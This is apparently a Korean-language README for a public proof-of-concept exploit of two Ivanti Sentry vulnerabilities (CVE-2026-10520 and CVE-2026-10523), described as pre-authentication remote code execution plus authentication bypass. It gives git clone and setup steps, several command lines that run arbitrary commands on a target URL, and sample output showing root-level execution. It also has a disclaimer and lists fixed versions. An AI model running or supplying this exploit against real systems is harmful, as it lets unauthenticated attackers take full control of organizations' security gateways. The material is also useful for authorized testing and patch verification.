
CVE-2026-10520
사전 인증 원격 코드 실행 + 인증 우회
저자: Ashraf Zaryouh "0xBlackash"
Ivanti Sentry(이전 MobileIron Sentry)에 영향을 미치는 두 가지 치명적인 취약점:
이러한 결함으로 인해 인증되지 않은 공격자가 시스템 전체를 장악할 수 있습니다.
python3 CVE-2026-10520.py --url <TARGET> --cmd <COMMAND>
# 기본 사용법
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "id"
# 상세 모드
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "whoami" -v
# 프록시 사용
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a" --proxy 127.0.0.1:8080
# 커널 확인
python3 CVE-2026-10520.py --url https://target.com:8443 --cmd "uname -a"
git clone https://github.com/0xBlackash/CVE-2026-10520.git
cd CVE-2026-10520
chmod +x CVE-2026-10520.py
취약할 경우 다음과 같은 출력을 볼 수 있습니다:
██████╗ ██╗ ██╗██████╗ ██╗ █████╗ ██████╗██╗ ██╗ █████╗ ███████╗██╗ ██╗
██╔═████╗╚██╗██╔╝██╔══██╗██║ ██╔══██╗██╔════╝██║ ██╔╝██╔══██╗██╔════╝██║ ██║
██║██╔██║ ╚███╔╝ ██████╔╝██║ ███████║██║ █████╔╝ ███████║███████╗███████║
████╔╝██║ ██╔██╗ ██╔══██╗██║ ██╔══██║██║ ██╔═██╗ ██╔══██║╚════██║██╔══██║
╚██████╔╝██╔╝ ██╗██████╔╝███████╗██║ ██║╚██████╗██║ ██╗██║ ██║███████║██║ ██║
╚═════╝ ╚═╝ ╚═╝╚═════╝ ╚══════╝╚═╝ ╚═╝ ╚═════╝╚═╝ ╚═╝╚═╝ ╚═╝╚══════╝╚═╝ ╚═╝
CVE-2026-10520 & CVE-2026-10523 PoC Exploit
Ivanti Sentry Pre-Auth RCE + Auth Bypass
Author: Ashraf Zaryouh "0xBlackash"
GitHub: https://github.com/0xBlackash
[+] 대상이 취약함!
명령 출력:
uid=0(root) gid=0(root) groups=0(root)
이 도구는 교육 및 승인된 보안 테스트 용도로만 사용하세요.
소유하지 않은 시스템에 대한 무단 사용은 불법입니다.
저자는 오용에 대해 책임을 지지 않습니다.
수정 버전: 10.5.2 / 10.6.2 / 10.7.1
❤️를 담아 Ashraf Zaryouh "0xBlackash" 제작
유용하게 사용하셨다면 레포지토리에 별표를 눌러주세요! ⭐
| 인자 | 설명 | 필수 여부 |
|---|
--url | 대상 URL (예: https://target:8443) | 예 |
--cmd | 실행할 명령어 | 예 |
-v, --verbose | 상세 출력 활성화 | 아니요 |
--proxy | HTTP 프록시 (호스트:포트) | 아니요 |